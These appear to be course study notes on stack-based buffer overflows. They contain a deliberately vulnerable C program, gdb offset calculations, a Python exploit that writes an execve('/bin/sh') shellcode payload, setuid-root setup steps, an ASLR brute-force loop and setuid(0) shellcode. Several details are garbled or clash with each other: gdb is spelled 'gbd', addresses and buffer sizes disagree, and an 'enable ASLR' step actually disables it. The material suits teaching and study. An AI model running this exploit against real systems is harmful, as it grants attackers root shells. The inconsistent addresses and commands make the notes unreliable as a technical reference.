Buffer Overflow

common security flaw
the following will discuss stack-based buffer overflow
- can also be executed on heap
Goal: exploit buffer overflow to run injected code
possible countermeasures:
- checking array bounds (program)
- address randomization (OS)
- dropping privileges when code executed inside setuid

Program memory stack

stack fills top down, heap fills down top
variable placement depends on type of variable: global, local, static, initialized etc.
- text segment - executable code of program
- data segment - static and global initialized data
- BSS segment - static and global un-initialized data
- heap - for dynamic memory allocation (mallow, calloc, etc.)
- stack - local variables, data related to function calls etc.

int x = 100;        // data segment (global)
void main(){
    int a = 2;      // stack (local)
    float b = 2.5;  // stack (local)
    static int y;   // BSS segment (static)

    // *ptr in stack, array data in heap
    int *ptr = (int *)malloc(2*sizeof(int));

    prt[0] = 5;     // heap
    prt[1] = 6;     // heap
    free(ptr);
}

                 |             |
(high addr)      |-------------|
 a, b, prt ----> |    stack    |
                 |-------------|
                 |      ↓      |
                 |             |
                 |      ↑      |
                 |-------------|
     array ----> |     heap    |
                 |-------------|
         y ----> |  BSS segmt  |
                 |-------------|         
         x ----> |  Data sgmt  |
                 |-------------|         
                 |  Text sgmt  |
                 |-------------|         
(low addr)       |             |

Stack Frame

stack stores data used for function calls
stack frame has 4 regions
- arguments - values of arguments passed into function; pushed in reverse order
- return address - next instruction after function call
- previous frame pointer - where function call was made
- local variables - compilers may randomize or add extra space for these
we do not know exact addresses
- frame pointer (in ebp register) refers to a fixed location
- points to location of previous frame pointer
- can compute the offset of other stack members from ebp

void f(int a, int b){
  int x;
}
void main(){
  f(1, 2);
}

   |       (high addr)  |             |
   |                    |-------------| ---
   |                    |             |    |
   |                    |             |    |---- main() stack frame
   |                    |-------------| ---|
   |     value of b --> |      2      |    |
   |                    |-------------|    |
   |     value of a --> |      1      |    |
   |                    |-------------|    |
   |    return addr --> |     ptr     |    |---- f() stack frame
   |                    |-------------|    |
   |    prev. frame --> |     ptr     |    |
   |                    |-------------| * -|---- frame pointer!
   |     value of x --> |      x      |    |
   |                    |-------------| ---|
   ↓                    |             |   
 stack 
 grows

Buffer overflow steps

overwriting stack frame return address with some random address
overflowing buffer can cause:
- invalid instructions: location exists but data at location is invalid → program crashes
- non-existing address: if address does not map to any location → program crashes
- access violation: address space is protected → program crashes
- valid address and instruction → attacker's code may execute

Example

stack.c

/* This program has a buffer overflow vulnerability. */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str)
{
    char buffer[100];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[400];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);

    printf("Returned Properly\n");
    return 1;
}

Goal: replace stack frame return address with new address that points to malicious code

find the offset distance between the base of the buffer and return address
find the address to place the malicious code
overwrite return address with address of malicious code

                        3. overwrite                    2. find 
                              ↓                       ↓  address 
 _________________________________________________________________
|     |     |         |               |         |     |           |
| NOP | NOP | ------- |  return addr  | ------- | NOP | Shellcode |
|_____|_____|_________|_______________|_________|_____|___________|

                      ↑ 1. find distance
↑ start of buffer          to here

Distance to return addr

Set breakpoint at foo() to find addresses:

in gbd

set breakpoint at foo by using b foo
call run to start execution
program will break at foo()

# disable countermeasures
$ gcc -z execstack -fno-stack-protector -g -o stack_dbg stack.c

$ touch badfile
$ gbd stack_dbg
....
(gbd) b foo  <-- breakpoint
Breakpoint 1 at 0x8048484a: file stack.c, line 14.
(gbd) run
....
Breakpoint 1, foo (str=0xbfffeb1c "...") at stack.c, line 10.
10 strcpy(buffer, str)

use gbp p command to print out address of ebp register and of buffer
then compute distance

(gbd) p $ebp
$1 = (void *) 0xbfffeaf8
(gbd) p &buffer
$1 = (char (*)[1000]) 0xbfffea8c
(gbd) p/d 0xbfffead8 - 0xbfffea6c
$3 = 108
(gbd) quit

frame pointer (ebp) is at 0xbfffeaf8
therefore return address is at 0xbfffeaf8 + 4
first address we can jump to is at 0xbfffeaf8 + 8

→ put 0xbfffeaf8 + 8 in return address location

return address location is start of buffer to ebp + 4 bytes above ebp

→ distance to return address is 108 + 4 = 112 (from buffer's addr 0xbfffea8c).

Address of malicious code

turn off countermeasures to make this step easier
investigate addresses using gbd → find address of function argument
for better chance of finding it, fill badfile with no-ops, then place the malicious code at the end of the file
- this creates multiple entry points: hitting any no op will eventually get us to malicious code.
- without no-ops need to guess address of malicious code exactly.

prog.c

#include <stdio.h>
void func(int* a){
  printf(" :: a1's address is 0x%x \n", (unsigned int) &a1);
}
int main(){
  int x = 3;
  func(&x);
  return 1;
}

When address randomization is turned off, can verify the program stack always starts from the same address

$ sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space=0
$ gcc prog.c -o prog
$ ./prog
  :: a1's address is 0xbffff370 
$ ./prog
  :: a1's address is 0xbffff370

Contents of badfile

        (known)              addr to here:
 -------- 112 --------     ↓ 0xbfffeaf8+8           (•̀ᴗ•́ )و     
|_____________________|_______________________________________
|     |     |         |    |     |         |     |            |
| NOP | NOP | ------- | RT | NOP | ------- | NOP |  bad code  |
|_____|_____|_________|____|_____|_________|_____|____________|
↑                          ↑-- fill with no-op --↑
0xbfffea8c              ↑    
                        ↑                     
                 put return addr here

Constructing badfile

exploit.py

#!/usr/bin/python3
import sys

shellcode= (
    "\x31\xc0"             # xorl    %eax,%eax -- zero w/o writing 0
    "\x50"                 # pushl   %eax
    "\x68""//sh"           # pushl   $0x68732f2f  <-- or "/zsh" 
    "\x68""/bin"           # pushl   $0x6e69622f
    "\x89\xe3"             # movl    %esp,%ebx
    "\x50"                 # pushl   %eax
    "\x53"                 # pushl   %ebx
    "\x89\xe1"             # movl    %esp,%ecx
    "\x99"                 # cdq     <-- same as xor to zero but -1 byte
    "\xb0\x0b"             # movb    $0x0b,%al
    "\xcd\x80"             # int     $0x80
).encode('latin-1')

# Fill the content with NOPs
content = bytearray(0x90 for i in range(300))      

# Put the shellcode at the end
start = 300 - len(shellcode)
content[start:] = shellcode                       

# Put the address at offset 112
# instead of +8 using +120 to account for other data on stack
# try different offsets here if this does not work
ret = 0xbfffead8 + 120                                   
content[112:116]  = (ret).to_bytes(4,byteorder='little')  

# Write the content to a file
with open('badfile', 'wb') as f:
  f.write(content)

The shellcode contains instructions to run execve("bin/sh", argv, 0) to gain access to the system

Registers used:

eax = 0x0000000b (11) : value of system call execve()
ebx = address to "/bin/sh"
ecx = address of the argument array.
- argv[0] = the address of "/bin/sh"
- argv[1] = 0 (i.e., no more arguments)
edx = zero (no environment variables are passed)
int 0x80 = invoke execve()

Overwrite return address

the address we overwrite with should not contain 0 as byte, otherwise badfile will have a 0 which causes strcpy() to end copying, e.g.

1	`0xffff188 + 0x78 = 0xffff200 <--- last byte is 0`

Executing the attack

Compile with countermeasures disabled:

1
2
3

$ gcc -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack

Execute:

$ chmod u+x exploit.py
$ rm badfile
$ exploit.py
$ ./stack
# id <-- root shell

Countermeasures

Developer: use safer functions like strncpy(), strncat() and safer dynamic link libraries that check length before copying
OS: Address space randomization (ASLR)
- randomized start location of stack such that address changes every time code is loaded in memory
- guessing stack address in memory is difficult
- Difficult to guess %ebp address, and address of malicious code
Compiler: Stack guard
- secret variable in the program
- compiler check for canary → detects "stack smashing" if variable has been modified
Hardware: Non-executable stack
- NX bit (non-executable) separates data from code and marks certain areas of memory as non-executable
- defeat by return-to-libc attack

Defeating ASLR

turn on address randomization

1	`$ sudo sysctl -w kernel.randomize_va_space=0`

Compile setuid version of stack.c

1
2
3

$ gcc -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack

Run the vulnerable code in an infinite loop

#!/bin/bash

SECONDS=0
value=0

while [ 1 ]
  do
  value=$(( $value + 1 ))
  duration=$SECONDS
  min=$(($duration / 60))
  sec=$(($duration % 60))
  echo "$min minutes and $sec seconds elapsed."
  echo "The program has been running $value times so far."
  ./stack
done

Defeating at shell

Bash and dash turn setuid process to non-setuid process, and drop privilege. Before running setuid, set real user id to 0:

shellcode= (
    "\x31\xc0"             # xorl     %eax,%eax     
    "\x31\xdb"             # xorl     %ebx,%ebx    
    "\xb0\xd5"             # movb     $0xd5,%al   
    "\xcd\x80"             # int      $0x80      
    #---- The code below is the same as the one shown before ---
    "\x31\xc0"             # xorl    %eax,%eax
    "\x50"                 # pushl   %eax
    "\x68""//sh"           # pushl   $0x68732f2f
    "\x68""/bin"           # pushl   $0x6e69622f
    "\x89\xe3"             # movl    %esp,%ebx
    "\x50"                 # pushl   %eax
    "\x53"                 # pushl   %ebx
    "\x89\xe1"             # movl    %esp,%ecx
    "\x99"                 # cdq
    "\xb0\x0b"             # movb    $0x0b,%al
    "\xcd\x80"             # int     $0x80
).encode('latin-1')